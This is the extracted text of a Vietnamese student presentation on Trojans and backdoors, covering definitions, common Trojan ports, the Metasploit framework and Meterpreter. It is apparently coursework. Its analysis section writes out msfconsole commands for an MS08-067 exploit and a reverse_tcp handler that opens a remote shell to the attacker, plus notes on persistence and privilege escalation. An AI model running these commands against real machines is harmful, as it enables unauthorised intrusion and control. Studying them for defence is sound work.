AN TOÀN HỆ ĐIỀU

HÀNH
TR O JAN-BACK D OO R
Giáo viên hướng dẫn: Đặng Thế Hùng
LÝ DO CHỌN ĐỀ TÀI

1. Ngày nay, với sự phát triển mạnh mẽ của công nghệ

thông tin đã giúp ích rất nhiều cho cuộc sống, bên cạnh
những lợi ích mang lại thì một thách thức lớn hơn đó là
vấn đề về bảo mật thông tin

2. Nhiều người vẫn lầm tưởng trojan là một loại của

virus, nhưng thực tế trojan và virus máy tính khác nhau
hoàn toàn, từ cách thức hoạt động đến cách thức lây
nhiễm. 
 NỘI
DUNG
Tìm hiểu Trojan - Backdoor
 01 02 03 04
TỔNG QUAN CƠ CHẾ PHÂN TÍCH THỰC HÀNH
Tìm hiểu khái niệm Tìm hiểu về Metasploit Xem xét và đánh giá một Tiến hành thử nghiệm
hình thức và cách thức tấn công hệ trong các trường hợp tấn cuộc tấn công xâm nhập
thống công
 TỔNG QUAN
01 Tìm hiểu về khái niệm và các hình thức
tấn công Backdoor – Trojan
TỔNG QUAN

GIỚI THIỆU CÁC CON CÁC PORT SỬ

TROJAN- CÁC DẠNG ĐƯỜNG LÂY DỤNG
BACKDOOR VÀ CÁCH TRUYỀN
HOẠT ĐỘNG
GIỚI THIỆU VỀ TROJAN

Trojan: Là một chương trình nhỏ chạy chế độ ẩn và gây

hại cho máy tính.

Với sự trợ giúp của Trojan, một kẻ tất công có thể dễ dàng
truy cập dữ liệu:

● Lấy cắp dữ liệu

● Xoá file
● Sửa đổi dữ liệu

Nhiều khả năng khác...

GIỚI THIỆU VỀ BACKDOOR
Backdoor (cửa hậu): trong phần mềm hay hệ thống máy tính
thường là một cổng không được thông báo rộng rãi, cho phép người
quản trị xâm nhập hệ thống để tìm nguyên nhân gây lỗi hoặc bảo
dưỡng. Ngoài ra nó cũng dùng để chỉ cổng bí mật mà hacker và gián
điệp dùng để truy cập bất hợp pháp.
Nó có thể được khai thác để :

● Gửi và nhận dữ liệu

● Kích hoạt mã độc
● Sử dụng và xoá dữ liệu
● Hiện thị thông báo lỗi
● Tự khởi động máy tính
TROJAN-BACKDOOR
Những chương trình như này thường
được sử dụng để liên kết những nhóm
máy tính bị lây nhiễm để tạo nên mô
hình mạng botnet hoặc zombie thường
gặp.

Từ đó có thể dễ dàng tập trung 1 số

lượng lớn hoặc rất lớn các máy tính –
lúc này đã trở thành công cụ cho tin tặc,
nhằm thực hiện những âm mưu hoặc
mục đích xấu
TROJAN-BACKDOOR

Backdoor không thể tự nhân

bản và lây lan,. Nhưng chỉ cần
nhận được lệnh đặc biệt từ phía
tin tặc, chúng sẽ đồng loạt lây
lan và sản sinh với số lượng
không thể kiểm soát được.
TROJAN-BACKDOOR

CÓ 2 LOẠI:

GÂY HẠI VÔ HẠI

● Tinh vi, khó phát hiện ● Thủ tục trong quá trình sản xuất
của nhà phát triển
● Sử dụng gói phần mềm Rootkit
để giữ “cửa hậu” luôn mở và
● Nhằm mục đích dự phòng
che giấu hoạt động trên internet
CÁC DẠNG VÀ CÁCH HOẠT
ĐỘNG CỦA TROJAN
Các dạng Trojan cơ bản:

● Remote Access Trojan – Cho kẻ tấn công kiểm soát toàn

bộ hệ thống từ xa.
● Data-Sending Trojan – Gửi những thông tin nhạy cảm
cho kẻ tấn công
● Destructive Trojan – Phá hủy hệ thống
● Denied-of-Service – DoS Attack Trojan –Trojan cho tấn
công DoS.
● Proxy Trojan – Tác dụng che giấu kẻ tấn công
● HTTP, FTP Trojan – Trojan tự tạo thành HTTP hay FTP
server để kẻ tấn công khai thác lỗi.
● Security Software Disable Trojan – Có tác dụng tắt
những tính năng bảo mật trong máy tính của nạn nhân.
CÁC DẠNG VÀ CÁCH HOẠT
ĐỘNG CỦA TROJAN
● Lấy thông tin tài khoản ngân hàng

● Lấy thông tin của các tài khoản cá nhân như:

Email, Password, Usernames,…
MỤC ĐÍCH CỦA KẺ VIẾT RA
TROJAN ???
● Sử dụng máy tính của nạn nhân để thực hiện
một tác vụ nào đó, như để tấn công, scan,
hay làm ngập hệ thống mạng của nạn nhân.
● ...
NHỮNG CON ĐƯỜNG ĐỂ MÁY TÍNH
NHIỄM TROJAN

CHIA
TẦNG KHI SẺ ẨN
VẬT LÝ CÁC FILE CHẠY FILE TRONG
WEB
TRAO ĐÍNH FILE BỊ QUA CÁC
ĐỘC
ĐỔI DỮ KÈM NHIỄM Net ỨNG
LIỆU BIOS DỤNG
CÁC PORT SỬ DỤNG BỞI CÁC
TROJAN PHỔ BIẾN

BACK ORIFICE DEEP THROAT NETBUS

UDP protocol UDP protocol TCP protocol
port: 31337, 31338 port: 2140, 3150 port: 12345. 12346

WHACK-A-MOLE NETBUS 2 PRO GIRLFRIEND

TCP protocol TCP protocol TCP protocol
port: 12361, 12362 port: 20034 port: 21544
 CƠ CHẾ
02 Tìm hiểu về Metasploit và cách thức tấn
công hệ thống
METASPLOIT

TỔNG QUAN PAYLOAD CÁC LỖI

METASPLOIT METERPRETER HỆ THỐNG

Giới thiệu về Metasploit Tìm hiểu về phương thức Các lỗi nguy hiểm đã
Frameworks và ứng dụng Payload Meterpreter được khai thác
METASPLOIT
Metasploit là một dự án bảo mật
máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng
như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát
hiện tấn công mạng
METASPLOIT

Một dự án con rất nổi tiếng của Metasploit là Metasploit

Framework.

Metasploit Framework là một môi trường dùng để kiểm tra ,tấn

công và khai thác lỗi của các service.
Metasploit có thể chạy trên hầu hết các hệ điều hành.
Gồm 4 phần cơ bản:

● Console interface
● Web interface
● Global Enviroment
● Temporary Enviroment
 METASPLOIT
FRAMEWORKS

Cấu hình exploit Lựa chọn mục tiêu Thực thi exploit
đã chọn
1 3 5

Chọn module Kiểm tra cấu hình Lựa chọn Payload

exploit 2 đã thiết lập 4 6
PAYLOAD METERPRETER

Là một payload nâng cao có trong Metasploit

Framework.

Mục đích của nó là để cung cấp những tập lệnh để

khai thác, tấn công các máy tính từ xa.

Đặc điểm có thể tránh các phần mềm chống virus do

được thực thi trong bộ nhớ, hoàn toàn không ghi lên
đĩa.
CÁC LỖI HỆ THỐNG

● Lỗi MS10-046 (2286198): Đây là một lỗi

rất nghiêm trọng liên quan đến Windows
Shell của cho tất cả các hệ điều hành bị
ảnh hưởng, cho phép kẻ tấn công chiếm
lấy toàn quyền điều khiển Windows và
thực thi mã nguồn từ xa.
CÁC LỖI HỆ THỐNG
● Lỗi BYPASS UAC: với tài
khoản của người quản trị, các
ứng dụng vẫn bị giới hạn như
những tài khoản thường khác
bởi tiện ích UAC (User Access
Control)
UAC, viết tắt của User Account Control, là
một tính năng bảo mật của Windows giúp
ngăn chặn các thay đổi trái phép đối với hệ
điều hành. Những thay đổi này có thể được bắt
đầu bởi các ứng dụng, người dùng,virus hoặc
các dạng phần mềm độc hại khác.
 PHÂN TÍCH
03 Xem xét và đánh giá một trong các trường
hợp tấn công
PHÂN TÍCH

CHIẾM QUYỀN PERSISTENT NÂNG QUYỀN

MÁY VICTIM BACKDOORS
KIỂU 1: TẤN CÔNG 1 MÁY CỤ THỂ BỊ
MỘT LỖI CỤ THỂ TRÊN HỆ ĐIỀU HÀNH

Kiểu này chỉ tấn công trong LAN, vì đây là kiểu thực hiện
tạo kết nối từ máy Hacker đi ra Victim nên IP của Victim
phải là IP private. Một vài trường hợp IP wan cũng được
nhưng là hy hữu.
 KIỂU 1: TẤN CÔNG 1 MÁY CỤ THỂ BỊ
MỘT LỖI CỤ THỂ TRÊN HỆ ĐIỀU HÀNH

Với kiểu tấn công này thì phải biết chính xác IP của Victim. Các Options cần set:
Msfconsole
Search “mã lỗ hổng” là để tìm đường dẫn code tấn công
Use “đường dẫn tới code tấn công vừa search được”
Set PAYLOAD windows/meterpreter/reverse_tcp là tấn công chiếm Win luôn set option
này
Set LHOST “IP Kali”
Set RHOST “IP Victim” là phải biết IP Victim
Set LPORT “Local port muốn set” là Port trên kali để thực hiện kết nối
Option RPORT được sét sẵn do lỗi giao thức nào thì tấn công trên port giao thức đó.
Vậy với các options trên đã đủ để thực hiện 1 kết nối tới Victim (chú ý: đây là kết nối
từ máy Hacker đến máy victim chính vì thế phải set RHOST)
KIỂU 1: TẤN CÔNG 1 MÁY CỤ THỂ BỊ
MỘT LỖI CỤ THỂ TRÊN HỆ ĐIỀU HÀNH

VD: tấn công Ms08_067; Ms09_050 (SMB)

Tấn công Windows Server 2003

MS 08_067
Msfconsole
msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.73.100
msf exploit(ms08_067_netapi) > set RHOST “IP Victim”
msf exploit(ms08_067_netapi) > exploit
KIỂU 2: REVERSE CONNECTION-TẤN
CÔNG QUA MẠNG INTERNET

Với kiểu tấn công này thì Victim sẽ tự tạo 1 kết nối về Hacker (bị
động-Hacker phải chờ Victim làm 1 điều gì đó trên máy của họ để
kích hoạt kết nối về Hacker). Vậy nên ko cần biết IP của Victim và
ko quan tâm đến Firewall trên Victim có on hay off vì đây là kết nối
từ Victim đi ra, mà firewall chặn chiều in. Và cũng có thể bypass
được hệ thống Firewall biên khi mở port 80, 443 vì Hacker hoàn
toàn chủ động định nghĩa Port trên máy Hacker để cho Victim thực
hiện reverse connect.
KIỂU 2: REVERSE CONNECTION-TẤN
CÔNG QUA MẠNG INTERNET

Các options cần set:

Use exploit/multi/handler ⇒ với kiểu reverse shell thì luôn luôn set như
thế này
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LHOST “IP của Hacker”
Set LPORT “port mà Hacker định nghĩa trong reverse shell” ⇒ nếu
không set thì default 4444
Exploit
PERSISTENT BACKDOORS

Sau khi chúng ta đã chiếm quyền điều khiển hệ thống công việc không
kém phần quan trọng là để lại backdoor để duy trì kết nối cho lần sau ngay
cả khi hệ thống bị reboot hoặc shutdown hoặc bị vá lỗi chúng ta cũng vẫn
chiếm quyền truy cập trở lại nhờ vào module  persistence.

Ta có 2 trường hợp xảy ra:

Trường hợp 1: máy victim sẽ reboot ngay và máy attacker vẫn còn mở
metasploit.
Trường hợp 2: máy victim sẽ tắt và máy attacker cũng tắt vài ngày.
NÂNG QUYỀN

Nâng quyền, leo thang bậc quyền hay chiếm quyền root là một
bước cần thiết sau khi khai thác xâm nhập được vào mục tiêu.
Việc này nhằm để kiểm soát được toàn bộ hệ thống của nạn nhân
rồi từ đó ta có thể thực hiện thay đổi dữ liệu, cài backdoor, xóa
dấu vết mà không bị giới hạn bởi quyền.

Đối với các máy tính Linux thì quyền cao nhất chính là
quyền root, còn Windows chính là quyền Administrator.
 THỰC HÀNH
04 Tiến hành thử nghiệm cuộc tấn công xâm
nhập
THANKS!
Đàm Chí Nguyên
Cổ Ngọc Minh Huy
Thái Công Lập
Hồ Thanh Duy